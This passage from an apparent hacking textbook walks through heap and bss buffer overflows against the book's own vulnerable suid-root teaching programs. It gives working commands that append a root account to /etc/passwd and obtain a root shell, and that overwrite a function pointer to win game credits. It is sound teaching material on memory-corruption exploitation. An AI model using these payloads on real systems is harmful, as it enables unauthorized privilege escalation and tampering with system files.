Buffer overflows can happen in other memory segments, like heap and bss. As in auth_overflow.c, if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered. This is true regardless of the memory segment these variables reside in; however, the control tends to be quite limited. Being able to find these control points and learning to make the most of them just takes some experience and creative thinking. While these types of overflows aren't as standardized as stack-based overflows, they can be just as effective.
The notetaker program from Chapter 0x200 is also susceptible to a buffer overflow vulnerability. Two buffers are allocated on the heap, and the first command-line argument is copied into the first buffer. An overflow can occur here.
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/var/notes");
if(argc < 2) // If there aren't command-line arguments,
usage(argv[0], datafile); // display usage message and exit.
strcpy(buffer, argv[1]); // Copy into buffer.
printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);Under normal conditions, the buffer allocation is located at 0x804a008, which is before the datafile allocation at 0x804a070, as the debugging output shows. The distance between these two addresses is 104 bytes.
reader@hacking:~/booksrc $ ./notetaker test [DEBUG] buffer @ 0x804a008: 'test' [DEBUG] datafile @ 0x804a070: '/var/notes' [DEBUG] file descriptor is 3 Note has been saved. reader@hacking:~/booksrc $ gdb -q (gdb) p 0x804a070 - 0x804a008 $1 = 104 (gdb) quit reader@hacking:~/booksrc $
Since the first buffer is null terminated, the maximum amount of data that can be put into this buffer without overflowing into the next should be 104 bytes.
reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104') [DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' [DEBUG] datafile @ 0x804a070: '' [!!] Fatal Error in main() while opening file: No such file or directory reader@hacking:~/booksrc $
As predicted, when 104 bytes are tried, the null-termination byte overflows into the beginning of the datafile buffer. This causes the datafile to be nothing but a single null byte, which obviously cannot be opened as a file. But what if the datafile buffer is overwritten with something more than just a null byte?
reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "A"x104 . "testfile"') [DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile' [DEBUG] datafile @ 0x804a070: 'testfile' [DEBUG] file descriptor is 3 Note has been saved. *** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 *** ======= Backtrace: ========= /lib/tls/i686/cmov/libc.so.6[0xb7f017cd] /lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30] ./notetaker[0x8048916] /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc] ./notetaker[0x8048511] ======= Memory map: ======== 08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker 08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker 0804a000-0806b000 rw-p 0804a000 00:00 0 [heap] b7d00000-b7d21000 rw-p b7d00000 00:00 0 b7d21000-b7e00000 ---p b7d21000 00:00 0 b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1 b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1 b7e99000-b7e9a000 rw-p b7e99000 00:00 0 b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0 b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0 b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack] ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso] Aborted reader@hack ing:~/booksrc $
This time, the overflow is designed to overwrite the datafile buffer with the string testfile. This causes the program to write to testfile instead of /var/notes, as it was originally programmed to do. However, when the heap memory is freed by the free() command, errors in the heap headers are detected and the program is terminated. Similar to the return address overwrite with stack overflows, there are control points within the heap architecture itself. The most recent version of glibc uses heap memory management functions that have evolved specifically to counter heap unlinking attacks. Since version 2.2.5, these functions have been rewritten to print debugging information and terminate the program when they detect problems with the heap header information. This makes heap unlinking in Linux very difficult. However, this particular exploit doesn't use heap header information to do its magic, so by the time free() is called, the program has already been tricked into writing to a new file with root privileges.
reader@hacking:~/booksrc $ grep -B10 free notetaker.c if(write(fd, buffer, strlen(buffer)) == -1) // Write note. fatal("in main() while writing buffer to file"); write(fd, "\n", 1); // Terminate line. // Closing file if(close(fd) == -1) fatal("in main() while closing file"); printf("Note has been saved.\n"); free(buffer); free(datafile); reader@hacking:~/booksrc $ ls -l ./testfile -rw------- 1 root reader 118 2007-09-09 16:19 ./testfile reader@hacking:~/booksrc $ cat ./testfile cat: ./testfile: Permission denied reader@hacking:~/booksrc $ sudo cat ./testfile ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA AAAAAAAAAtestfile reader@hacking:~/booksrc $
A string is read until a null byte is encountered, so the entire string is written to the file as the userinput. Since this is a suid root program, the file that is created is owned by root. This also means that since the filename can be controlled, data can be appended to any file. This data does have some restrictions, though; it must end with the controlled filename, and a line with the user ID will be written, also.
There are probably several clever ways to exploit this type of capability. The most apparent one would be to append something to the /etc/passwd file. This file contains all of the usernames, IDs, and login shells for all the users of the system. Naturally, this is a critical system file, so it is a good idea to make a backup copy before messing with it too much.
reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd.bkup reader@hacking:~/booksrc $ head /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh reader@hacking:~/booksrc $
The fields in the /etc/passwd file are delimited by colons, the first field being for login name, then password, user ID, group ID, username, home directory, and finally the login shell. The password fields are all filled with the x character, since the encrypted passwords are stored elsewhere in a shadow file. (However, this field can contain the encrypted password.) In addition, any entry in the password file that has a user ID of 0 will be given root privileges. That means the goal is to append an extra entry with both root privileges and a known password to the password file.
The password can be encrypted using a one-way hashing algorithm. Because the algorithm is one way, the original password cannot be recreated from the hash value. To prevent lookup attacks, the algorithm uses a salt value, which when varied creates a different hash value for the same input password. This is a common operation, and Perl has a crypt() function that performs it. The first argument is the password, and the second is the salt value. The same password with a different salt produces a different salt.
reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA"). "\n"'
AA6tQYSfGxd/A
reader@hacking:~/booksrc $ perl -e 'print crypt("password", "XX"). "\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $Notice that the salt value is always at the beginning of the hash. When a user logs in and enters a password, the system looks up the encrypted password for that user. Using the salt value from the stored encrypted password, the system uses the same one-way hashing algorithm to encrypt whatever text the user typed as the password. Finally, the system compares the two hashes; if they are the same, the user must have entered the correct password. This allows the password to be used for authentication without requiring that the password be stored anywhere on the system.
Using one of these hashes in the password field will make the password for the account be password, regardless of the salt value used. The line to append to /etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash
However, the nature of this particular heap overflow exploit won't allow that exact line to be written to /etc/passwd, because the string must end with /etc/passwd. However, if that filename is merely appended to the end of the entry, the passwd file entry would be incorrect. This can be compensated for with the clever use of a symbolic file link, so the entry can both end with /etc/passwd and still be a valid line in the password file. Here's how it works:
reader@hacking:~/booksrc $ mkdir /tmp/etc reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash reader@hacking:~/booksrc $
Now /tmp/etc/passwd points to the login shell /bin/bash. This means that a valid login shell for the password file is also /tmp/etc/passwd, making the following a valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd
The values of this line just need to be slightly modified so that the portion before /etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc
-c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 .
":/root:/tmp"'
| wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 .
":/root:/tmp"'
| wc -c
104
reader@hacking:~/booksrc $If /etc/passwd is added to the end of that final string (shown in bold), the string above will be appended to the end of the /etc/passwd file. And since this line defines an account with root privileges with a password we set, it won't be difficult to access this account and obtain root access, as the following output shows.
reader@hacking:~/booksrc $ ./notetaker $(perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp/etc/passwd"') [DEBUG] buffer @ 0x804a008: 'myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd' [DEBUG] datafile @ 0x804a070: '/etc/passwd' [DEBUG] file descriptor is 3 Note has been saved. *** glibc detected *** ./notetaker: free(): invalid next size (normal): 0x0804a008 *** ======= Backtrace: ========= /lib/tls/i686/cmov/libc.so.6[0xb7f017cd] /lib/tls/i686/cmov/libc.so.6(cfree+0x90)[0xb7f04e30] ./notetaker[0x8048916] /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xdc)[0xb7eafebc] ./notetaker[0x8048511] ======= Memory map: ======== 08048000-08049000 r-xp 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker 08049000-0804a000 rw-p 00000000 00:0f 44384 /cow/home/reader/booksrc/notetaker 0804a000-0806b000 rw-p 0804a000 00:00 0 [heap] b7d00000-b7d21000 rw-p b7d00000 00:00 0 b7d21000-b7e00000 ---p b7d21000 00:00 0 b7e83000-b7e8e000 r-xp 00000000 07:00 15444 /rofs/lib/libgcc_s.so.1 b7e8e000-b7e8f000 rw-p 0000a000 07:00 15444 /rofs/lib/libgcc_s.so.1 b7e99000-b7e9a000 rw-p b7e99000 00:00 0 b7e9a000-b7fd5000 r-xp 00000000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd5000-b7fd6000 r--p 0013b000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd6000-b7fd8000 rw-p 0013c000 07:00 15795 /rofs/lib/tls/i686/cmov/libc-2.5.so b7fd8000-b7fdb000 rw-p b7fd8000 00:00 0 b7fe4000-b7fe7000 rw-p b7fe4000 00:00 0 b7fe7000-b8000000 r-xp 00000000 07:00 15421 /rofs/lib/ld-2.5.so b8000000-b8002000 rw-p 00019000 07:00 15421 /rofs/lib/ld-2.5.so bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack] ffffe000-fffff000 r-xp 00000000 00:00 0 [vdso] Aborted reader@hacking:~/booksrc $ tail /etc/passwd avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false cupsys:x:106:113::/home/cupsys:/bin/false haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false gdm:x:109:118:Gnome Display Manager:/var/lib/gdm:/bin/false matrix:x:500:500:User Acct:/home/matrix:/bin/bash jose:x:501:501:Jose Ronnick:/home/jose:/bin/bash reader:x:999:999:Hacker,,,:/home/reader:/bin/bash ? myroot:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA:/ root:/tmp/etc/passwd reader@hacking:~/booksrc $ su myroot Password: root@hacking:/home/reader/booksrc# whoami root root@hacking:/home/reader/booksrc#
If you have played with the game_of_chance.c program enough, you will realize that, similar to at a casino, most of the games are statistically weighted in favor of the house. This makes winning credits difficult, despite how lucky you might be. Perhaps there's a way to even the odds a bit. This program uses a function pointer to remember the last game played. This pointer is stored in the user structure, which is declared as a global variable. This means all the memory for the user structure is allocated in the bss segment.
// Custom user struct to store information about users
struct user {
int uid;
int credits;
int highscore;
char name[100];
int (*current_game) ();
};
...
// Global variables
struct user player; // Player structThe name buffer in the user structure is a likely place for an overflow. This buffer is set by the input_name() function, shown below:
// This function is used to input the player name, since
// scanf("%s", &whatever) will stop input at the first space.
void input_name() {
char *name_ptr, input_char='\n';
while(input_char == '\n') // Flush any leftover
scanf("%c", &input_char); // newline chars.
name_ptr = (char *) &(player.name); // name_ptr = player name's address
while(input_char != '\n') { // Loop until newline.
*name_ptr = input_char; // Put the input char into name field.
scanf("%c", &input_char); // Get the next char.
name_ptr++; // Increment the name pointer.
}
*name_ptr = 0; // Terminate the string.
}This function only stops inputting at a newline character. There is nothing to limit it to the length of the destination name buffer, meaning an overflow is possible. In order to take advantage of the overflow, we need to make the program call the function pointer after it is overwritten. This happens in the play_the_game() function, which is called when any game is selected from the menu. The following code snippet is part of the menu selection code, used for picking and playing a game.
if((choice < 1) || (choice > 7)) printf("\n[!!] The number %d is an invalid selection.\n\n", choice); else if (choice < 4) { // Otherwise, choice was a game of some sort. if(choice != last_game) { // If the function ptr isn't set, if(choice == 1) // then point it at the selected game player.current_game = pick_a_number; else if(choice == 2) player.current_game = dealer_no_match; else player.current_game = find_the_ace; last_game = choice; // and set last_game. } play_the_game(); // Play the game. }
If last_game isn't the same as the current choice, the function pointer of current_game is changed to the appropriate game. This means that in order to get the program to call the function pointer without overwriting it, a game must be played first to set the last_game variable.
reader@hacking:~/booksrc $ ./game_of_chance -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 70 credits] -> 1 [DEBUG] current_game pointer @ 0x08048fde ####### Pick a Number ###### This game costs 10 credits to play. Simply pick a number between 1 and 20, and if you pick the winning number, you will win the jackpot of 100 credits! 10 credits have been deducted from your account. Pick a number between 1 and 20: 5 The winning number is 17 Sorry, you didn't win. You now have 60 credits Would you like to play again? (y/n) n -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 60 credits] -> [1]+ Stopped ./game_of_chance reader@hack ing:~/booksrc $
You can temporarily suspend the current process by pressing CTRL-Z. At this point, the last_game variable has been set to 1, so the next time 1 is selected, the function pointer will simply be called without being changed. Back at the shell, we figure out an appropriate overflow buffer, which can be copied and pasted in as a name later. Recompiling the source with debugging symbols and using GDB to run the program with a breakpoint on main() allows us to explore the memory. As the output below shows, the name buffer is 100 bytes from the current_game pointer within the user structure.
reader@hacking:~/booksrc $ gcc -g game_of_chance.c reader@hacking:~/booksrc $ gdb -q ./a.out Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". (gdb) break main Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41. (gdb) run Starting program: /home/reader/booksrc/a.out Breakpoint 1, main () at game_of_chance.c:41 41 srand(time(0)); // Seed the randomizer with the current time. (gdb) p player $1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>, current_game = 0} (gdb) x/x &player.name 0x804b66c <player+12>: 0x00000000 (gdb) x/x &player.current_game 0x804b6d0 <player+112>: 0x00000000 (gdb) p 0x804b6d0 - 0x804b66c $2 = 100 (gdb) quit The program is running. Exit anyway? (y or n) y reader@hacking:~/booksrc $
Using this information, we can generate a buffer to overflow the name variable with. This can be copied and pasted into the interactive Game of Chance program when it is resumed. To return to the suspended process, just type fg, which is short for foreground.
reader@hacking:~/booksrc $ perl -e 'print "A"x100 . "BBBB" . "\n"' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAABBBB reader@hacking:~/booksrc $ fg ./game_of_chance 5 Change user name Enter your new name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB Your name has been changed. -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB] [You have 60 credits] -> 1 [DEBUG] current_game pointer @ 0x42424242 Segmentation fault reader@hacking:~/booksrc $
Select menu option 5 to change the username, and paste in the overflow buffer. This will overwrite the function pointer with 0x42424242. When menu option 1 is selected again, the program will crash when it tries to call the function pointer. This is proof that execution can be controlled; now all that's needed is a valid address to insert in place of BBBB.
The nm command lists symbols in object files. This can be used to find addresses of various functions in a program.
reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux
08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
w __gmon_start__
08049669 T __i686.get_pc_thunk.bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
U __libc_start_main@@GLIBC_2.0
0804b630 A _edata
0804b6d4 A _end
080496a0 T _f ini
080496c0 R _fp_hw
08048484 T _init
080485c0 T _start
080485e4 t call_gmon_start
U close@@GLIBC_2.0
0804b640 b completed.1
0804b624 W data_start
080490d1 T dealer_no_match
080486fc T dump
080486d1 T ec_malloc
U exit@@GLIBC_2.0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
U getuid@@GLIBC_2.0
08048d97 T input_name
08048d70 T jackpot
08048803 T main
U malloc@@GLIBC_2.0
U open@@GLIBC_2.0
0804b62c d p.0
U perror@@GLIBC_2.0
08048fde T pick_a_number
08048f23 T play_the_game
0804b660 B player
08048df8 T print_cards
U printf@@GLIBC_2.0
U rand@@GLIBC_2.0
U read@@GLIBC_2.0
08048aaf T register_new_player
U scanf@@GLIBC_2.0
08048c72 T show_highscore
U srand@@GLIBC_2.0
U strcpy@@GLIBC_2.0
U strncat@@GLIBC_2.0
08048e91 T take_wager
U time@@GLIBC_2.0
08048b72 T update_player_data
U write@@GLIBC_2.0
reader@hacking:~/booksrc $The jackpot() function is a wonderful target for this exploit. Even though the games give terrible odds, if the current_game function pointer is carefully overwritten with the address of the jackpot() function, you won't even have to play the game to win credits. Instead, the jackpot() function will just be called directly, doling out the reward of 100 credits and tipping the scales in the player's direction.
This program takes its input from standard input. The menu selections can be scripted in a single buffer that is piped to the program's standard input. These selections will be made as if they were typed. The following example will choose menu item 1, try to guess the number 7, select n when asked to play again, and finally select menu item 7 to quit.
reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n7\n"' | ./game_of_chance -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 60 credits] -> [DEBUG] current_game pointer @ 0x08048fde ####### Pick a Number ###### This game costs 10 credits to play. Simply pick a number between 1 and 20, and if you pick the winning number, you will win the jackpot of 100 credits! 10 credits have been deducted from your account. Pick a number between 1 and 20: The winning number is 20 Sorry, you didn't win. You now have 50 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 50 credits] -> Thanks for playing! Bye. reader@hacking:~/booksrc $
This same technique can be used to script everything needed for the exploit. The following line will play the Pick a Number game once, then change the username to 100 A's followed by the address of the jackpot() function. This will overflow the current_game function pointer, so when the Pick a Number game is played again, the jackpot() function is called directly.
reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\ x8d\x04\x08\n" . "1\nn\n" . "7\n"' 1 5 n 5 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAp? 1 n 7 reader@hack ing:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\ x8d\x04\x08\n" . "1\nn\n" . "7\n"' | ./game_of_chance -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 50 credits] -> [DEBUG] current_game pointer @ 0x08048fde ####### Pick a Number ###### This game costs 10 credits to play. Simply pick a number between 1 and 20, and if you pick the winning number, you will win the jackpot of 100 credits! 10 credits have been deducted from your account. Pick a number between 1 and 20: The winning number is 15 Sorry, you didn't win. You now have 40 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 40 credits] -> Change user name Enter your new name: Your name has been changed. -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 40 credits] -> [DEBUG] current_game po inter @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 140 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 140 credits] -> Thanks for playing! Bye. reader@hacking:~/booksrc $
After confirming that this method works, it can be expanded upon to gain any number of credits.
reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\ x8d\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nJon Erickson\n7\n"' | ./ game_of_chance -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 140 credits] -> [DEBUG] current_game pointer @ 0x08048fde ####### Pick a Number ###### This game costs 10 credits to play. Simply pick a number between 1 and 20, and if you pick the winning number, you will win the jackpot of 100 credits! 10 credits have been deducted from your account. Pick a number between 1 and 20: The winning number is 1 Sorry, you didn't win. You now have 130 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 130 credits] -> Change user name Enter your new name: Your name has been changed. -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 130 credits] -> [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 230 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 330 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 430 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 530 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 630 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 730 credits Would you like to play aga in? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 830 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 930 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 1030 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 1130 credits Would you like to play again? (y/n) [DEBUG] current_game pointer @ 0x08048d70 *+*+*+*+*+* JACKPOT *+*+*+*+*+* You have won the jackpot of 100 credits! You now have 1230 credits Would you like to play again? (y/n) -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?] [You have 1230 credits] -> Change user name Enter your new name: Your name has been changed. -=[ Game of Chance Menu ]=- 1 - Play the Pick a Number game 2 - Play the No Match Dealer game 3 - Play the Find the Ace game 4 - View current high score 5 - Change your user name 6 - Reset your account at 100 credits 7 - Quit [Name: Jon Erickson] [You have 1230 credits] -> Thanks for playing! Bye. reader@hacking:~/booksrc $
As you might have already noticed, this program also runs suid root. This means shellcode can be used to do a lot more than win free credits. As with the stack-based overflow, shellcode can be stashed in an environment variable. After building a suitable exploit buffer, the buffer is piped to the game_of_chance's standard input. Notice the dash argument following the exploit buffer in the cat command. This tells the cat program to send standard input after the exploit buffer, returning control of the input. Even though the root shell doesn't display its prompt, it is still accessible and still escalates privileges.
